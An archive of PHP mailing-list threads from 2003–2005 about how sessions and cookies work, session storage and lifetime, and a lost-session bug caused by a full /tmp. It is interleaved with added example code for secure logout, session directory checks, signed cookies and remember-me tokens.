Re: [PHP] Sessions and cookies

2005-02-22 Thread Jochem Maas
Brett Patterson wrote:
 Well, if you look in your phpinfo() file, you will see a SESSION_TIMEOUT or
 SESSION_LENGTH value that is something like 18... different for each
 server.
 If you hold all your session values in the array, then you can use
 session_destroy(); as long as session_start() is previous to that.
i.e. you must have an active session for php to destroy it.
 I am under the impression that both Sessions and Cookies are stored on the
 user end, but I may be wrong.
the contents of $_SESSION are stored on the server only (unless you're doing
something very convoluted or wrong IMHO). when a session is started a cookie
is also sent to the browser (under certain conditions the session id will be
passed via GET param instead - BTWWF), the value of the cookie is the session
id, which is used to recognise the browser (when session_start() is called).
...
 What is also the default life span of a session object? and can this
 be changed?
check your php config:
<?php phpinfo(); ?>
you can set the lifetime in your script, more info here:
http://php.net/session
--
BTWWF - Browse The Web (With Firefox ;-)
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
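Jochem's pointer to phpinfo() and the session lifetime settings, carried through as an added example (editor's code, not from the thread). It reads the two values phpinfo() shows, sets the cookie parameters before session_start(), and adds the check that the cookie lifetime alone does not give you: the expiry the browser receives is advisory, so the server records a last-activity time in $_SESSION and expires idle sessions itself. The 30-minute limit and /login.php are placeholders.

```php
<?php
// Added example, editor's code (not from the thread).
declare(strict_types=1);

const IDLE_TIMEOUT_SECONDS = 1800;   // constructed value: 30 minutes without a request

// The values Jochem points at in phpinfo(). gc_maxlifetime is the age after
// which the garbage collector may delete the server-side data;
// cookie_lifetime (0 = until the browser closes) is what the browser is told.
function describeSessionLifetime(): array
{
    return [
        'gc_maxlifetime'  => (int) ini_get('session.gc_maxlifetime'),
        'cookie_lifetime' => (int) ini_get('session.cookie_lifetime'),
        'save_path'       => ini_get('session.save_path') ?: sys_get_temp_dir(),
    ];
}

// Idle-timeout enforcement on the server. The timestamp lives in $_SESSION,
// so the client cannot extend it by editing the cookie. Returns false when
// the session has been idle longer than $idleLimit seconds.
function touchSessionOrExpire(array &$session, int $now, int $idleLimit): bool
{
    if (isset($session['last_activity'])
        && $now - (int) $session['last_activity'] > $idleLimit) {
        return false;
    }
    $session['last_activity'] = $now;
    return true;
}

// Cookie parameters must be set before session_start() sends the cookie.
session_set_cookie_params([
    'lifetime' => 0,        // discarded when the browser closes
    'path'     => '/',
    'secure'   => true,     // HTTPS only
    'httponly' => true,     // not readable from page scripts
    'samesite' => 'Lax',
]);
session_start();

if (!touchSessionOrExpire($_SESSION, time(), IDLE_TIMEOUT_SECONDS)) {
    $_SESSION = [];
    session_destroy();
    header('Location: /login.php');   // placeholder login page
    exit;
}

print_r(describeSessionLifetime());
```

Run from the command line it just prints the three configured values; included at the top of a page it also logs out anyone whose last request is older than the limit, regardless of what the browser does with the cookie.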


Re: [PHP] Sessions and cookies

2005-02-22 Thread Chris Shiflett
 When a session object is created - where is it stored?

Assuming you mean session data, it is stored on the server, in /tmp by
default.

 To destroy the session object (with all session variables inside the
 particular session object) can I use session_destroy();

http://www.php.net/session_destroy says:

session_destroy() destroys all of the data associated with the current
session. It does not unset any of the global variables associated with the
session, or unset the session cookie.

This means that session_destroy deletes the particular record from the
session data store. It does not act on the cookie nor the $_SESSION
superglobal array.

Hope that helps.

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/

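The point Chris makes, as an added example (editor's code, not Chris's): a logout that deals with the two things session_destroy() leaves alone, the $_SESSION array and the browser's cookie, and then the server-side record, in that order. The /login.php target is a placeholder.

```php
<?php
// Added example, editor's code (not Chris's): a full logout.
declare(strict_types=1);

session_start();

function logout(): void
{
    // 1. The in-memory copy: session_destroy() leaves $_SESSION as it was
    //    for the rest of this request, so clear it explicitly.
    $_SESSION = [];

    // 2. The browser's cookie: re-send the session cookie with an expiry
    //    in the past and the same attributes it was issued with, otherwise
    //    the browser keeps presenting the old id on the next request.
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', [
            'expires'  => time() - 42000,
            'path'     => $p['path'],
            'domain'   => $p['domain'],
            'secure'   => $p['secure'],
            'httponly' => $p['httponly'],
            'samesite' => $p['samesite'] ?? 'Lax',
        ]);
    }

    // 3. The server-side record (the file under session.save_path, or
    //    whatever save handler is configured): this is all that
    //    session_destroy() does by itself.
    session_destroy();
}

logout();
header('Location: /login.php');   // placeholder login page
exit;
```

Step 2 is the one most often skipped; without it the old id is still sent by the browser, and with session.use_strict_mode off PHP will happily create a fresh session under that same id.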



[PHP] Sessions and cookies

2005-02-21 Thread Jacques
When a session object is created - where is it stored? (Perhaps on the
application server - IIS or Apache?) Or in a cookie on a user's
computer?

To destroy the session object (with all session variables inside the
particular session object) can I use session_destroy();

What is also the default life span of a session object? and can this
be changed?

Regards

Jacques




RE: [PHP] Sessions and cookies

2005-02-21 Thread Brett Patterson
Well, if you look in your phpinfo() file, you will see a SESSION_TIMEOUT or
SESSION_LENGTH value that is something like 18... different for each
server.

If you hold all your session values in the array, then you can use
session_destroy(); as long as session_start() is previous to that.

I am under the impression that both Sessions and Cookies are stored on the
user end, but I may be wrong.

~Brett

-Original Message-
From: Jacques [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, February 22, 2005 1:20 AM
To: php-general@lists.php.net
Subject: [PHP] Sessions and cookies

When a session object is created - where is it stored? (Perhaps on the
application server - IIS or Apache?) Or in a cookie on a user's
computer?

To destroy the session object (with all session variables inside the
particular session object) can I use session_destroy();

What is also the default life span of a session object? and can this
be changed?

Regards

Jacques




RE: [PHP] Opinion: PHP Sessions or Cookies

2004-07-14 Thread Dennis Seavers
Just as folks can turn off JavaScript, they can reject cookies.  Sessions
have some advantages over cookies.


 [Original Message]
 From: Ed Lazor [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Date: 07/13/2004 2:47:31 PM
 Subject: [PHP] Opinion:  PHP Sessions or Cookies

 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be using
 cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?

 In case you're curious, more details on the specifics of the problem I'm
 experiencing:

 I have a prepend file that executes start_session.  The script assumes the
 user is a guest if $_SESSION[UserID] is not set.  All guests route to the
 login screen.  Successful authentication sets $_SESSION[UserID] and sends
 you to the original requested page.

 It seems fairly straightforward to me.  People are able to login and start
 using the site, but the login screen displays randomly after they've already
 authenticated successfully.

 It sounds like PHP session data is being lost on the server.  I've also seen
 error messages on web pages that report PHP / MySQL as having trouble
 reading from the temp directory.  Here's the exact message:  ERRORError
 writing file '/tmp/MYiYcf7q' (Errcode: 28).

 Anyway, those are the details.  I look forward to hearing what you think.

 -Ed






[PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-14 Thread Torsten Roehr
Ed Lazor [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be using
 cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?

 In case you're curious, more details on the specifics of the problem I'm
 experiencing:

 I have a prepend file that executes start_session.  The script assumes the
 user is a guest if $_SESSION[UserID] is not set.  All guests route to the
 login screen.  Successful authentication sets $_SESSION[UserID] and sends
 you to the original requested page.

 It seems fairly straightforward to me.  People are able to login and start
 using the site, but the login screen displays randomly after they've already
 authenticated successfully.

 It sounds like PHP session data is being lost on the server.  I've also seen
 error messages on web pages that report PHP / MySQL as having trouble
 reading from the temp directory.  Here's the exact message:  ERRORError
 writing file '/tmp/MYiYcf7q' (Errcode: 28).

Hi Ed,

have you tried storing your session data in a database? Storing session data
in a database has some advantages over the standard file based solution,
mainly data security and comfort. For example, if you want to get the number
of the active sessions just do a simple select count(*) from sessions.

Regards, Torsten Roehr




Re: [PHP] Opinion: PHP Sessions or Cookies

2004-07-14 Thread Justin Patrin
Except that sessions rely on data being passed to and from the client,
usually in a cookie. You can do it yourself by passing the SID
manually or using trans sid, but cookies are the normal way to keep
the session working.

On Wed, 14 Jul 2004 00:10:17 -0700, Dennis Seavers
[EMAIL PROTECTED] wrote:
 Just as folks can turn off JavaScript, they can reject cookies.  Sessions
 have some advantages over cookies.
 
  [Original Message]
  From: Ed Lazor [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Date: 07/13/2004 2:47:31 PM
  Subject: [PHP] Opinion:  PHP Sessions or Cookies
 
  I'm using PHP sessions for user tracking.  My host provider's server is
  dropping session data.  He swears it's my scripts and says I should be using
  cookies for better security.  That goes completely opposite to my
  understanding, so I'd like to run it by you guys.  Which is more secure:
  PHP sessions or cookies?

  In case you're curious, more details on the specifics of the problem I'm
  experiencing:

  I have a prepend file that executes start_session.  The script assumes the
  user is a guest if $_SESSION[UserID] is not set.  All guests route to the
  login screen.  Successful authentication sets $_SESSION[UserID] and sends
  you to the original requested page.

  It seems fairly straightforward to me.  People are able to login and start
  using the site, but the login screen displays randomly after they've already
  authenticated successfully.

  It sounds like PHP session data is being lost on the server.  I've also seen
  error messages on web pages that report PHP / MySQL as having trouble
  reading from the temp directory.  Here's the exact message:  ERRORError
  writing file '/tmp/MYiYcf7q' (Errcode: 28).

  Anyway, those are the details.  I look forward to hearing what you think.

  -Ed



-- 
DB_DataObject_FormBuilder - The database at your fingertips
http://pear.php.net/package/DB_DataObject_FormBuilder

paperCrane --Justin Patrin--




[PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-14 Thread Harlequin
I am using PHP sessions for my site. Have done the numbers and have to agree
that although cookies make life easier for the developer the whole reason
for cookies is to make life easier for the browser.

We have to accept that not all users can interrogate a cookie download and
verify if the site is safe, so sessions it is :)

-- 
-
 Michael Mason
 Arras People
 www.arraspeople.co.uk
-
Ed Lazor [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be using
 cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?

 In case you're curious, more details on the specifics of the problem I'm
 experiencing:

 I have a prepend file that executes start_session.  The script assumes the
 user is a guest if $_SESSION[UserID] is not set.  All guests route to the
 login screen.  Successful authentication sets $_SESSION[UserID] and sends
 you to the original requested page.

 It seems fairly straightforward to me.  People are able to login and start
 using the site, but the login screen displays randomly after they've already
 authenticated successfully.

 It sounds like PHP session data is being lost on the server.  I've also seen
 error messages on web pages that report PHP / MySQL as having trouble
 reading from the temp directory.  Here's the exact message:  ERRORError
 writing file '/tmp/MYiYcf7q' (Errcode: 28).

 Anyway, those are the details.  I look forward to hearing what you think.

 -Ed





Re: [PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-14 Thread Justin Patrin
..sessions are easier IMHO

On Wed, 14 Jul 2004 16:40:33 +0100, Harlequin
[EMAIL PROTECTED] wrote:
 I am using PHP sessions for my site. Have done the numbers and have to agree
 that although cookies make life easier for the developer the whole reason
 for cookies is to make life easier for the browser.
 
 We have to accept that not all users can interrogate a cookie download and
 verify if the site is safe, so sessions it is :)
 
 --
 -
  Michael Mason
  Arras People
  www.arraspeople.co.uk
 -
 Ed Lazor [EMAIL PROTECTED] wrote in message
 news:[EMAIL PROTECTED]
  I'm using PHP sessions for user tracking.  My host provider's server is
  dropping session data.  He swears it's my scripts and says I should be using
  cookies for better security.  That goes completely opposite to my
  understanding, so I'd like to run it by you guys.  Which is more secure:
  PHP sessions or cookies?

  In case you're curious, more details on the specifics of the problem I'm
  experiencing:

  I have a prepend file that executes start_session.  The script assumes the
  user is a guest if $_SESSION[UserID] is not set.  All guests route to the
  login screen.  Successful authentication sets $_SESSION[UserID] and sends
  you to the original requested page.

  It seems fairly straightforward to me.  People are able to login and start
  using the site, but the login screen displays randomly after they've already
  authenticated successfully.

  It sounds like PHP session data is being lost on the server.  I've also seen
  error messages on web pages that report PHP / MySQL as having trouble
  reading from the temp directory.  Here's the exact message:  ERRORError
  writing file '/tmp/MYiYcf7q' (Errcode: 28).

  Anyway, those are the details.  I look forward to hearing what you think.

  -Ed



-- 
DB_DataObject_FormBuilder - The database at your fingertips
http://pear.php.net/package/DB_DataObject_FormBuilder

paperCrane --Justin Patrin--




RE: [PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-14 Thread Ed Lazor


 -Original Message-
 have you tried storing your session data in a database? Storing session
 data in a database has some advantages over the standard file based
 solution, mainly data security and comfort. For example, if you want to
 get the number of the active sessions just do a simple select count(*)
 from sessions.

I'm not storing sessions into the database right now, but I have before and
I'll probably do it again =)

-Ed




Re: [PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-14 Thread Torsten Roehr
  -Original Message-
  have you tried storing your session data in a database? Storing session
  data in a database has some advantages over the standard file based
  solution, mainly data security and comfort. For example, if you want to
  get the number of the active sessions just do a simple select count(*)
  from sessions.

 I'm not storing sessions into the database right now, but I have before and
 I'll probably do it again =)

I'm doing it with the help of PEAR::DB and PEAR::HTTP_Session - really
simple! Are you interested in sample code?

Regards, Torsten




[PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Ed Lazor
I'm using PHP sessions for user tracking.  My host provider's server is
dropping session data.  He swears it's my scripts and says I should be using
cookies for better security.  That goes completely opposite to my
understanding, so I'd like to run it by you guys.  Which is more secure:
PHP sessions or cookies?

In case you're curious, more details on the specifics of the problem I'm
experiencing:

I have a prepend file that executes start_session.  The script assumes the
user is a guest if $_SESSION[UserID] is not set.  All guests route to the
login screen.  Successful authentication sets $_SESSION[UserID] and sends
you to the original requested page.

It seems fairly straightforward to me.  People are able to login and start
using the site, but the login screen displays randomly after they've already
authenticated successfully.

It sounds like PHP session data is being lost on the server.  I've also seen
error messages on web pages that report PHP / MySQL as having trouble
reading from the temp directory.  Here's the exact message:  ERRORError
writing file '/tmp/MYiYcf7q' (Errcode: 28).

Anyway, those are the details.  I look forward to hearing what you think.

-Ed



Re: [PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Marek Kilimajer
Ed Lazor wrote:
I'm using PHP sessions for user tracking.  My host provider's server is
dropping session data.  He swears it's my scripts and says I should be using
cookies for better security.  That goes completely opposite to my
understanding, so I'd like to run it by you guys.  Which is more secure:
PHP sessions or cookies?
Session certainly.
It sounds like PHP session data is being lost on the server.  I've also seen
error messages on web pages that report PHP / MySQL as having trouble
reading from the temp directory.  Here's the exact message:  ERRORError
writing file '/tmp/MYiYcf7q' (Errcode: 28).
Looks like /tmp directory is out of space. Change the directory to your 
own, it's more secure anyway.

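Marek's advice to move the session files to a directory of your own, as an added example (editor's code, not Marek's). The directory path and the free-space threshold are assumptions. The check covers the two failure modes this thread discusses, an unwritable directory and one that has run out of space (Errcode 28 is ENOSPC, "no space left on device", on Linux), and fails closed rather than letting PHP fall back to a store that drops sessions at random.

```php
<?php
// Added example, editor's code (not Marek's).
declare(strict_types=1);

const SESSION_DIR    = '/var/lib/myapp/sessions';  // assumed path, outside the web root
const MIN_FREE_BYTES = 50 * 1024 * 1024;           // constructed threshold: 50 MB

// Returns a list of problems; an empty list means the directory is usable.
function checkSessionDir(string $dir, int $minFree): array
{
    $problems = [];
    if (!is_dir($dir)) {
        // 0700: only the owning user can list or read the session files,
        // and with a directory of your own you know exactly who that is.
        if (!@mkdir($dir, 0700, true)) {
            return ["cannot create $dir"];
        }
    }
    if (!is_writable($dir)) {
        $problems[] = "$dir is not writable by the PHP process";
    }
    $mode = fileperms($dir);
    if ($mode !== false && ($mode & 0077) !== 0) {
        $problems[] = sprintf('%s is group/world accessible (mode %o)', $dir, $mode & 0777);
    }
    $free = @disk_free_space($dir);
    if ($free !== false && $free < $minFree) {
        // Ed's "Errcode: 28" is ENOSPC: no space left on device.
        $problems[] = sprintf('%s has only %d bytes free', $dir, $free);
    }
    return $problems;
}

$problems = checkSessionDir(SESSION_DIR, MIN_FREE_BYTES);
if ($problems !== []) {
    // Fail closed: a site that silently carries on with a broken store logs
    // users out at random, which is the symptom this thread started with.
    error_log('session store unusable: ' . implode('; ', $problems));
    http_response_code(503);
    exit;
}
ini_set('session.save_path', SESSION_DIR);   // must precede session_start()
session_start();
```

On a host where php.ini cannot be edited, the ini_set() call in the prepend file is the same change Ed reports making; the directory check is what tells you whether the new location is actually being used.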


Re: [PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Justin Patrin
Sounds like it could be a permissions issue to /tmp, but that's not
likely as some work and some don't. More likely, /tmp isn't big
enough. Ask the provider to check to see if it's being filled up (you
can also check yourself with the 'df' command on the command-line).

It could also be an old version of PHP or the timeout settings for
sessions. Check that stuff in phpinfo().

On Tue, 13 Jul 2004 14:47:16 -0700, Ed Lazor [EMAIL PROTECTED] wrote:
 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be using
 cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?
 
 In case you're curious, more details on the specifics of the problem I'm
 experiencing:
 
 I have a prepend file that executes start_session.  The script assumes the
 user is a guest if $_SESSION[UserID] is not set.  All guests route to the
 login screen.  Successful authentication sets $_SESSION[UserID] and sends
 you to the original requested page.
 
 It seems fairly straightforward to me.  People are able to login and start
 using the site, but the login screen displays randomly after they've already
 authenticated successfully.
 
 It sounds like PHP session data is being lost on the server.  I've also seen
 error messages on web pages that report PHP / MySQL as having trouble
 reading from the temp directory.  Here's the exact message:  ERRORError
 writing file '/tmp/MYiYcf7q' (Errcode: 28).
 
 Anyway, those are the details.  I look forward to hearing what you think.
 
 -Ed
 


-- 
DB_DataObject_FormBuilder - The database at your fingertips
http://pear.php.net/package/DB_DataObject_FormBuilder

paperCrane --Justin Patrin--




RE: [PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Ed Lazor


 -Original Message-
 Looks like /tmp directory is out of space. Change the directory to your
 own, it's more secure anyway.

I keep watching and /tmp seems ok space-wise, but I like the idea of
overriding where session files are stored.  I just made that change and I'm
waiting for feedback from users to see if they're still getting login
prompts.

Thanks Marek =)

-Ed




[PHP] Re: Opinion: PHP Sessions or Cookies

2004-07-13 Thread Kim Steinhaug
Sessions are the best thing to use, cookies are nice as a supplement.
If you want your users to be able to auto-login cookies are just
the thing to use, but apart from this cookies are not my favourite.

Another thing is that many browsers nowadays have turned cookies
all off.. I remember a friend of mine did a support system where the
login system was pure cookies... Man - did their staff get a lot of
support from people who didn't manage to log into the system...
As mentioned - these were users with cookies turned off

As the other users mentioned, the /tmp folder might be out of space,
however your provider might also have some custom setup on that
server which screws up the /tmp folder here and there. I know for
a fact one large provider here in Norway who has this problem on
one of their servers due to a heavy site which from time to time
sucks up resources resulting in the /tmp folder getting messed up.

If you still haven't solved your problem, get your provider to move you
to another of his servers (physically!), or change provider. You shouldn't
be having these problems.

--

--
Kim Steinhaug
-
There are 10 types of people when it comes to binary numbers:
those who understand them, and those who don't.
-
www.steinhaug.com - www.easywebshop.no - www.easycms.no www.webkitpro.com
-


Ed Lazor [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be using
 cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?

 In case you're curious, more details on the specifics of the problem I'm
 experiencing:

 I have a prepend file that executes start_session.  The script assumes the
 user is a guest if $_SESSION[UserID] is not set.  All guests route to the
 login screen.  Successful authentication sets $_SESSION[UserID] and sends
 you to the original requested page.

 It seems fairly straightforward to me.  People are able to login and start
 using the site, but the login screen displays randomly after they've already
 authenticated successfully.

 It sounds like PHP session data is being lost on the server.  I've also seen
 error messages on web pages that report PHP / MySQL as having trouble
 reading from the temp directory.  Here's the exact message:  ERRORError
 writing file '/tmp/MYiYcf7q' (Errcode: 28).

 Anyway, those are the details.  I look forward to hearing what you think.

 -Ed





Re: [PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Chris Shiflett
--- Ed Lazor [EMAIL PROTECTED] wrote:
 I'm using PHP sessions for user tracking.  My host provider's server is
 dropping session data.  He swears it's my scripts and says I should be
 using cookies for better security.  That goes completely opposite to my
 understanding, so I'd like to run it by you guys.  Which is more secure:
 PHP sessions or cookies?

First, I'd like to point out that sessions and cookies aren't opposite
ideas at all. In fact, PHP's default session mechanism uses cookies for
the session identifier (PHPSESSID).

The way I interpret your question is to ask whether it's better to store
session data on the server (in $_SERVER) or on the client (in cookies).
When stored on the client, you rely on the client to send all session data
to the server for every single request. These requests are sent across the
Internet. The Internet is a public network. Hopefully this makes it clear
that storing data on the server is more secure than having it sent across
a public network for every single HTTP transaction (multiple transactions
are typically required to render a single Web page).

I think your instinct (That goes completely opposite to my
understanding) serves you well. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly
 Coming Fall 2004
HTTP Developer's Handbook - Sams
 http://httphandbook.org/
PHP Community Site
 http://phpcommunity.org/




Re: [PHP] Opinion: PHP Sessions or Cookies

2004-07-13 Thread Jason Wong
On Wednesday 14 July 2004 12:45, Chris Shiflett wrote:

 The way I interpret your question is to ask whether it's better to store
 session data on the server (in $_SERVER) or on the client (in cookies).

So that people don't get confused: $_SERVER should be $_SESSION.

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
...though his invention worked superbly -- his theory was a crock of sewage 
from
beginning to end. -- Vernor Vinge, The Peace War
*/




[PHP] PHP Sessions and Cookies

2004-03-03 Thread Paul Higgins
I have a couple of questions regarding sessions and cookies:

1)  Is there a way to append information to a cookie?  I have read that it 
is, but I have also read many problems.  Is there any particular way to do 
this?  I ask this because cookies are being generated by two different types 
of scripts.  However, they are both on the same site.  So, I have access to 
them, no problem.  I just want to append information to the same cookie.

2)  If I append the PHP session id to every url, will PHP skip the cookies 
completely?  I know this is more insecure.  This option is only important if 
I cannot append information to the cookie.

Thanks,

Paul


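Paul's first question gets no answer in the thread; as an added example (editor's code), this is how "appending" to a cookie works in practice. There is no append operation: the script reads the whole value from $_COOKIE, merges the new fields in and re-sends the complete value with setcookie(), which replaces the existing cookie of the same name, path and domain. Since the value lives on the client, it is also signed with an HMAC so a cookie that was edited in the browser is rejected rather than trusted. The cookie name and the key are assumptions.

```php
<?php
// Added example, editor's code (not from the thread).
declare(strict_types=1);

const COOKIE_NAME = 'prefs';                              // assumed cookie name
const COOKIE_KEY  = 'constructed-secret-load-from-config'; // assumed; keep the real one out of source

// value = base64(json) "." hmac-sha256(base64(json))
function encodeCookie(array $fields, string $key): string
{
    $payload = base64_encode(json_encode($fields, JSON_THROW_ON_ERROR));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

// Returns the fields, or null if the cookie is absent, malformed, or
// signed with a different key (i.e. it was changed on the client).
function decodeCookie(?string $raw, string $key): ?array
{
    if ($raw === null || substr_count($raw, '.') !== 1) {
        return null;
    }
    [$payload, $mac] = explode('.', $raw, 2);
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;
    }
    $decoded = base64_decode($payload, true);
    $fields  = $decoded === false ? null : json_decode($decoded, true);
    return is_array($fields) ? $fields : null;
}

// The "append": whatever the other script stored is kept, the new fields are
// merged in, and the complete value is returned for re-sending. A tampered
// cookie decodes to null and is simply started over.
function appendToCookie(?string $raw, array $newFields, string $key): string
{
    $fields = decodeCookie($raw, $key) ?? [];
    return encodeCookie(array_merge($fields, $newFields), $key);
}

// Another script on the same site stored, say, a language earlier; this one
// adds a theme without losing it.
$raw = $_COOKIE[COOKIE_NAME] ?? null;
$value = appendToCookie(is_string($raw) ? $raw : null, ['theme' => 'dark'], COOKIE_KEY);
setcookie(COOKIE_NAME, $value, [
    'expires'  => time() + 30 * 86400,
    'path'     => '/',       // same path and domain as the other script, otherwise the
    'secure'   => true,      // browser ends up holding two cookies of that name
    'httponly' => true,
    'samesite' => 'Lax',
]);
// $_COOKIE is not updated until the browser's next request; use $value locally.
```

The signature detects modification only; the fields are still readable by anyone holding the cookie, so nothing confidential belongs in it, which is the same reason the threads above keep user data in $_SESSION.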


[PHP] PHP Sessions and Cookies

2003-06-30 Thread Matt MacLeod
Guys/Gals,
I've built a registration page on a site that stores a unique id for a 
user when they register. That id is then stored in a database and set as 
a session variable and as a cookie and is used to register personal user 
preferences.

The reason I use both is that I don't really want to make people log in 
every time they revisit the site. I use the session so that people who 
have cookies turned off can still benefit from the personalisation. The 
cookie is used so that when a user revisits the site, they don't have to 
log in again.

I then have a script that I call in every page that checks for the 
session variable and the cookie. I have been testing the script using

echo $_SESSION['usr']; and
echo $_COOKIE['usr'];
and I get correct values for both. Unfortunately if I then close the 
browser, reopen it and visit the site, both the cookie and the session 
produce no values. Obviously, the session value should be blank, but the 
cookie should produce a value.

This is my 'global' cookie/session checker script:

<?php
session_start();

// CHECK IF SESSION EXISTS.
if (!isset($_SESSION['usr'])) {
    // IF NO, THEN CHECK FOR COOKIE
    if (isset($_COOKIE['usr'])) {
        // IF 'YES' THEN START SESSION FROM THE COOKIE VALUE
        $_SESSION['usr'] = $_COOKIE['usr'];
    }
    // IF THERE IS NO COOKIE EITHER, NOTHING TO DO
} else {
    // IF THE SESSION EXISTS, MAKE SURE THE COOKIE VALUE MATCHES THAT OF THE
    // SESSION: RE-SEND THE COOKIE WITH A FAR-FUTURE EXPIRY, SITE-WIDE PATH
    // AND THE SITE'S DOMAIN
    setcookie('usr', $_SESSION['usr'],
        mktime(21, 0, 0, 12, 31, 2014), '/', 'bigbarn0.kbnet.net', 0);
}
// END
?>

If anyone can point out an error, please do!

Thanks,
Matt
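An added example (editor's code, not Matt's and not from either thread) that keeps the shape of Matt's checker but applies the point Chris Shiflett makes in the "Sessions or Cookies" thread above: data kept on the client can be rewritten by the client, so a persistent cookie that carries the user id itself lets whoever edits the cookie be treated as that user. Here the cookie carries only a random token and the server maps it back to the user id. The cookie name, lifetime, domain and the in-memory token store are assumptions; the store stands in for the database table Matt mentions. Two cookie details Matt's script relies on are also made explicit: a cookie outlives the browser session only when it is sent with an expiry, and the browser returns it only to hosts that match its domain attribute.

```php
<?php
// Added example, editor's code (not Matt's, not from the thread).
declare(strict_types=1);

const REMEMBER_COOKIE = 'remember';          // assumed cookie name
const REMEMBER_DAYS   = 30;                  // assumed persistent lifetime
const COOKIE_DOMAIN   = 'www.example.test';  // assumed; must match the host the browser visits

// Server-side token store: constructed in-memory stand-in for the database
// table Matt describes. Only a hash of each token is stored, so a copy of
// the table does not yield working cookies.
$tokenStore = [];

function issueRememberToken(array &$store, string $userId, int $now): string
{
    $token = bin2hex(random_bytes(32));       // 256 random bits
    $store[hash('sha256', $token)] = [
        'usr'     => $userId,
        'expires' => $now + REMEMBER_DAYS * 86400,
    ];
    return $token;
}

// Single use: a presented token is consumed, and the caller issues a fresh
// one. Returns the user id, or null if the token is unknown or expired.
function consumeRememberToken(array &$store, string $token, int $now): ?string
{
    $key = hash('sha256', $token);
    if (!isset($store[$key])) {
        return null;
    }
    $entry = $store[$key];
    unset($store[$key]);
    return $entry['expires'] >= $now ? $entry['usr'] : null;
}

function sendRememberCookie(string $token, int $now): void
{
    setcookie(REMEMBER_COOKIE, $token, [
        'expires'  => $now + REMEMBER_DAYS * 86400,  // explicit expiry: survives a browser restart
        'path'     => '/',
        'domain'   => COOKIE_DOMAIN,
        'secure'   => true,
        'httponly' => true,    // page scripts cannot read the token
        'samesite' => 'Lax',
    ]);
}

// Called by the login/registration page after the credential check succeeds.
function rememberUser(array &$store, string $userId, int $now): void
{
    $_SESSION['usr'] = $userId;
    sendRememberCookie(issueRememberToken($store, $userId, $now), $now);
}

// The checker itself, in the position of Matt's global script.
session_start();
$now = time();

if (!isset($_SESSION['usr']) && isset($_COOKIE[REMEMBER_COOKIE])) {
    $usr = consumeRememberToken($tokenStore, (string) $_COOKIE[REMEMBER_COOKIE], $now);
    if ($usr !== null) {
        session_regenerate_id(true);            // new session id once identity is established
        rememberUser($tokenStore, $usr, $now);  // sets $_SESSION['usr'], rotates the cookie
    }
}
```

The session still carries the user id, as in Matt's version; only the persistent cookie changed. Whether a cookie comes back at all after a restart is decided by the expiry and domain attributes above, which is where to look first when $_COOKIE is empty on a fresh visit.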


[PHP] Sessions or Cookies?

2003-02-19 Thread Sidar Lopez Cruz
1, What do I have to do to manage sessions in my RedHat 8?
2, What do I have to do to manage cookies in my RedHat 8?

I try to use session vars, but they don't work.

I try to use cookies, and when I open two browsers, the same cookie is in both
browsers... this is a problem.

I need to carry the user_id in my site during the cookie's life; when I use cookies, the
problems begin... I always get the same cookie in any browser that I open...



:-) Sidar Lopez Cruz
- Cero Riesgo, S.A.



Re: [PHP] Sessions or Cookies?

2003-02-19 Thread Ernest E Vogelsinger
At 15:49 19.02.2003, Sidar Lopez Cruz spoke out and said:
[snip]
1, What do I have to do to manage sessions in my RedHat 8?
2, What do I have to do to manage cookies in my RedHat 8?

I try to use session vars, but they don't work.

I try to use cookies, and when I open two browsers, the same cookie is in both
browsers... this is a problem.

I need to carry the user_id in my site during the cookie's life; when I use
cookies, the problems begin... I always get the same cookie in any browser
that I open...
[snip] 

Cookies are always used by the browser within all windows (from the same
browser). You may either instruct clients to use two different browsers
(IE, Netscape) at the same time, which seems quite impractical, or simply
disable cookies and go with url-based session variables: in your php.ini
file, locate the entry session.use_cookies and set it to 0:
session.use_cookies = 0
Then restart Apache.

This will allow you to use different session ids within the same browser.
However you need to find a mechanism to split that up - if a client works
on your site and opens a new window with the same url (Ctrl+N, e.g.), the
window will initially have the same url, hence the same session id. There's
